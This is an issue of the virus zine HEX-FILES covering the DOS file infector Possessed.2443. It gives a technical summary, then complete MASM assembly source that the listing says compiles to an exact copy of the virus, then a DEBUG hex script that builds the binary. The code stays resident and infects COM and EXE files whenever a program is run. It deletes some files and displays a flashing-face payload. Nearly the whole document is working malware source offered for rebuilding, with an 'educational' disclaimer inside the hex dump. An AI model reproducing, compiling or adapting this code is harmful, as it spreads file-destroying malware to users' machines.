
Hexfiles Issue 2 File 007


  
HEX-FILES No. 2 File 007
════════════════════════════════════════════════════════════════════════════

Virus: Possessed.2443
Alias: Possessed 1.05, Possessed I
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2443 bytes
InfectiveLength:
COM: 2443 bytes
EXE: 2443 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1067..Eof-1066] = 41h 4bh) and
(File[16..81] = Virus[8..73])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"C:*.COM", "C:*.EXE" <--- drive letter varies
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"COMMAND.COM"
DisplayedText:
If the EXEC of the host program failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
after 3 hours if it became resident through any other program




── POS2443.ASM STARTS HERE ────────────────────────────────────────────

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2443
; Alias: Possessed 1.05, Possessed II
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled
; in a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
; Standard DOS MZ executable header (the first 28 bytes of an EXE file).
; Each field comment states how this listing reads or writes the field;
; fields the listing never touches are marked as such.
ExeHeader struc
isExeId dw ?          ; 'MZ' signature (compared as the word 'ZM' when a file is examined)
isMod dw ?            ; bytes used in the last 512-byte page (0 = last page is full)
isBlocks dw ?         ; number of 512-byte pages in the file, header included
isRelocItemCt dw ?    ; relocation table entry count (not referenced in this listing)
isHeaderSize dw ?     ; header size in 16-byte paragraphs
isMinAlloc dw ?       ; minimum extra paragraphs required (not referenced in this listing)
isMaxAlloc dw ?       ; maximum extra paragraphs requested (not referenced in this listing)
isSs dw ?             ; initial SS, relative to the load segment
isSp dw ?             ; initial SP
isCxSum dw ?          ; checksum field; the value 1970h here is the EXE infection marker (see FileSelfRec above)
isIp dw ?             ; initial IP
isCs dw ?             ; initial CS, relative to the load segment
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0

MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h

PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry

PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26

isDos:
jmp DosHandler

DosVersion db ?
FirstGenerationFlag db 1
DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ?
ErrorIntSegment dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?

DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl
mov ExeAsciiz,bl
mov ah,2fh
call UseDos
push es
push bx
mov ah,1ah
mov dx,offset SaveVictimCode
call UseDos
mov cx,21h
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect
jmp PassToDos
InfectOthersFirst:
mov dx,offset SaveVictimCode
add dx,28
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl
mov byte ptr [bx+01],':'
call SaveRegistersBeforeInfect
jmp InfectExecutingProgram
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
PassToDos:
popf
jmp DosInterrupt
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb

assume cs:Possessed, ds:Possessed

push ds
push dx
push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov FileDate,dx
mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,Handle
mov ax,4202h
call UseDos
jc Relay12
mov ComLength,ax
call MovePointerBegin
Relay12:
jc Relay11
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay11:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected
InfectCheckCom:
mov si,cx
sub si,(offset VirusStack-offset FaceData)
js Relay2
cmp word ptr [si],4b41h
je VerifyComInfection
Relay2:
jmp NotInfected

VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile

DoneWithFile:
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters

NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov ActivateLength,3
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay3:
jmp DoneWithFile

SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace

assume cs:Possessed, ds:nothing

CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jnc EnoughDiskSpace
jmp DeleteFile

EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay3
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?
LocEndOfFile dw ?

assume cs:Possessed, ds:Possessed

isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es
push cs
pop ds
mov dx,ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h) ;ffa3
mov LocComEntry,dx
jmp JumperSet

ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay4:
jmp Relay3

WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay4
jmp DoneWithFile

DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

PixelRow equ Environment+100h
PixelColumn equ Psp+100h

isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt

ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate

EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay5
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay5:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret

UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

MoveCursor:
mov ah,2
xor bx,bx
int 10h
ret

Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

ExecuteExeVictim:
pop es
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(FaceData-EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ExeEntry
add ax,(3521h-3306h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode

NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+3],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName

CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted
OldDos:
int 21h

VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

NameofVictim db 13 dup (?)

ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax
cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx

NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h


SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)

Possessed ends

end PossessedEntry

── POS2443.ASM ENDS HERE ──────────────────────────────────────────────


── POS2443.SCR STARTS HERE ────────────────────────────────────────────

N POS2443.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AF 0B 52 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74 6F
E 0160 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45 58
E 0170 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 0A 48
E 0180 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75 74
E 0190 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72 65
E 01A0 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65
E 01B0 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70
E 01C0 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69 6D 61
E 01D0 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 62 72
E 01E0 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 20 74
E 01F0 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 20 6F
E 0200 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69
E 0210 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A 70 65
E 0220 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65
E 0230 73 20 74 68 69 73 20 76 69 72 69 69 20 62 65 61
E 0240 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 73 69
E 0250 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73 2F 68
E 0260 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A 54 68
E 0270 69 73 20 76 69 72 69 69 20 69 73 20 73 74 72 69
E 0280 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61 74 69
E 0290 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65 73 65
E 02A0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02B0 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07 01 B4
E 02C0 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 4F 07 0D
E 02D0 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21 20
E 02E0 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21 24
E 02F0 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E 4A
E 0300 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55 0A
E 0310 1A EB 37 90 06 00 4A 00 C5 0D 2E 03 C5 0D BE 04
E 0320 A3 0E 08 04 35 05 20 00 05 00 EE 21 68 24 C7 01
E 0330 4C 0F 7A 01 03 03 08 04 0A 06 00 00 00 00 00 00
E 0340 00 00 00 00 00 00 8D 0E 93 0E 9C 3D 00 4B 75 7C
E 0350 1E 06 56 57 50 53 51 52 8B DA 8A 1F 0E 1F 88 1E
E 0360 05 07 88 1E 0D 07 B4 2F E8 2D 04 06 53 B4 1A BA
E 0370 31 09 E8 23 04 B9 21 00 BA 05 07 B4 4E E8 18 04
E 0380 73 1F BA 0D 07 B4 4E E8 0E 04 73 15 5A 1F B4 1A
E 0390 E8 05 04 5A 59 5B 58 5F 5E 07 1F E8 1A 00 EB 2C
E 03A0 90 BA 31 09 83 C2 1C 8B DA 8A 0E 05 07 88 0F C6
E 03B0 47 01 3A E8 02 00 EB D4 1E 06 56 57 50 53 51 52
E 03C0 EB 10 90 5A 59 5B 58 5F 5E 07 1F C3 9D 2E FF 2E
E 03D0 4F 00 2E 8C 1E 5B 00 2E 89 16 5D 00 8B F2 83 C6
E 03E0 02 8B DE 80 3C 5C 75 06 8B DE 43 EB 06 90 80 3C
E 03F0 00 74 15 46 EB ED B8 24 25 2E 8B 16 57 00 2E 8E
E 0400 1E 59 00 E8 92 03 EB BB 8B F3 0E 07 BF DB 08 B9
E 0410 0D 00 FC F3 A4 1E 52 06 1F B8 24 35 E8 79 03 8C
E 0420 06 59 00 89 1E 57 00 B8 24 25 BA BE 04 E8 68 03
E 0430 5A 1F B8 00 43 E8 60 03 72 BC 2E 89 0E 5F 00 B8
E 0440 01 43 B9 20 00 E8 50 03 72 EE B8 02 3D E8 48 03
E 0450 72 E6 2E A3 61 00 8B D8 B8 00 57 E8 3A 03 2E 89
E 0460 16 65 00 2E 89 0E 63 00 BB FE FF B4 48 E8 28 03
E 0470 73 07 B4 48 E8 21 03 72 BF 2E A3 69 00 33 C9 8B
E 0480 D1 2E 8B 1E 61 00 B8 02 42 E8 0C 03 72 07 2E A3
E 0490 67 00 E8 1E 03 72 11 2E 8B 0E 67 00 33 D2 2E 8E
E 04A0 1E 69 00 B4 3F E8 F0 02 72 36 0E 07 33 F6 81 3C
E 04B0 4D 5A 75 0A 81 7C 12 70 19 74 25 EB 5F 90 8B F1
E 04C0 81 EE 2B 04 78 06 81 3C 41 4B 74 03 EB 4E 90 BE
E 04D0 10 00 BF 08 00 B9 21 00 FC F3 A7 74 03 E9 3F 01
E 04E0 2E 8E 06 69 00 B4 49 E8 AE 02 2E 8B 1E 61 00 2E
E 04F0 8B 16 65 00 2E 8B 0E 63 00 B8 01 57 E8 99 02 B4
E 0500 3E E8 94 02 2E 8E 1E 5B 00 2E 8B 16 5D 00 2E 8B
E 0510 0E 5F 00 B8 01 43 E8 7F 02 E9 A7 FE 06 2E 8E 1E
E 0520 5B 00 2E 8B 36 5D 00 8A 14 80 EA 40 1F C6 06 6E
E 0530 00 03 BE 13 05 B9 0B 00 B0 17 E8 88 02 BF DB 08
E 0540 E8 8C 02 9C F6 D8 E8 7C 02 9D 72 11 80 3E 4D 00
E 0550 03 73 02 EB 8B C6 06 6E 00 0B EB 18 90 B4 36 E8
E 0560 36 02 33 D2 F7 E3 F7 E1 0B D2 75 08 3D C4 09 73
E 0570 03 E9 AB 00 2E 8B 1E 61 00 E8 37 02 72 D5 2E 8E
E 0580 1E 69 00 33 F6 81 3C 4D 5A 75 13 E9 40 01 2E 8B
E 0590 1E 0C 01 2E 8B 36 0E 01 FF E3 AF 0B 52 0B 1E 1E
E 05A0 BF 31 09 B9 2D 00 FC F3 A5 07 0E 1F 8B 16 67 00
E 05B0 80 3E 6E 00 0B 75 0F 89 16 D5 02 81 EA A3 FF 89
E 05C0 16 D3 02 EB 13 90 52 81 C2 E8 09 89 16 D3 02 5A
E 05D0 81 C2 8B 09 89 16 D5 02 BE C7 02 33 FF B9 08 00
E 05E0 FC F3 A5 BE 08 00 B9 21 00 FC F3 A5 E8 C4 01 1F
E 05F0 2E 8B 0E 67 00 2E 80 3E 6E 00 0B 75 04 81 E9 8B
E 0600 09 33 D2 B4 40 E8 90 01 73 03 E9 46 FF 0E 1F BA
E 0610 00 00 B9 8B 09 B4 40 E8 7E 01 72 EE E9 C1 FE 2E
E 0620 8E 1E 5B 00 2E 8B 16 5D 00 B4 41 E8 6A 01 E9 AF
E 0630 FE 9C 2E FF 06 6B 00 75 07 2E FE 0E 6D 00 74 06
E 0640 9D 2E FF 2E 53 00 9D B8 06 00 CD 10 0E 1F 33 DB
E 0650 33 D2 BE 60 05 C7 06 7F 01 C8 00 C7 06 81 01 00
E 0660 00 E8 3E 00 C7 06 7F 01 C9 00 C7 06 81 01 01 00
E 0670 E8 2F 00 C7 06 7F 01 BD 00 C7 06 81 01 FF FF E8
E 0680 20 00 C7 06 7F 01 C9 00 C7 06 81 01 FF FF E8 11
E 0690 00 C7 06 7F 01 BD 00 C7 06 81 01 01 00 E8 02 00
E 06A0 EB B0 56 B0 01 B9 02 00 51 56 8A 1C 0A DB 74 16
